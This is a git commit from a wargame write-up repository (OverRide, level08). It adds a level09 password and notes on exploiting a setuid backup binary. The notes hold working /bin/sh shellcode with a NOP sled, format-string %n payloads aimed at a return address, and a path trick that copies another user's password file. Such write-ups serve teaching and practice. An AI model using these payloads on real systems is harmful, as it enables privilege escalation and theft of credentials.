feat: level08 + level09 elf
This commit is contained in:
parent
8b91fc4f30
commit
17686e16d3
|
@ -0,0 +1 @@
|
|||
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
|
|
@ -0,0 +1,44 @@
|
|||
load shellcode in env with nop slide
|
||||
|
||||
level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
|
||||
level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
|
||||
level08@OverRide:~$
|
||||
|
||||
|
||||
(gdb) p (char *)getenv("SHELLCODE")
|
||||
$1 = 0xffffffffffffe892 <Address 0xffffffffffffe892 out of bounds>
|
||||
|
||||
need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
|
||||
|
||||
Better version (file doesn't need to exist as log_wrapper is called before fopen)
|
||||
|
||||
level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
|
||||
ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
|
||||
level08@OverRide:~$ cat backups/.log
|
||||
LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
|
||||
level08@OverRide:~$
|
||||
|
||||
with env -i :
|
||||
Breakpoint 1, 0x0000000000400a5a in main ()
|
||||
(gdb) p (char *)getenv("SHELLCODE")
|
||||
$1 = 0xffffffffffffef79 <Address 0xffffffffffffef79 out of bounds>
|
||||
|
||||
|
||||
|
||||
env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
|
||||
|
||||
|
||||
actually its way simpler T_T :
|
||||
|
||||
level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
|
||||
level08@OverRide:~$ cd /tmp
|
||||
level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
|
||||
ERROR: Failed to open /home/users/level09/pass
|
||||
level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
|
||||
level08@OverRide:/tmp$ cat backups/
|
||||
home/ .log
|
||||
level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
|
||||
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
|
||||
level08@OverRide:/tmp$ exit
|
||||
logout
|
||||
Connection to localhost closed.
|
Binary file not shown.
Loading…
Reference in New Issue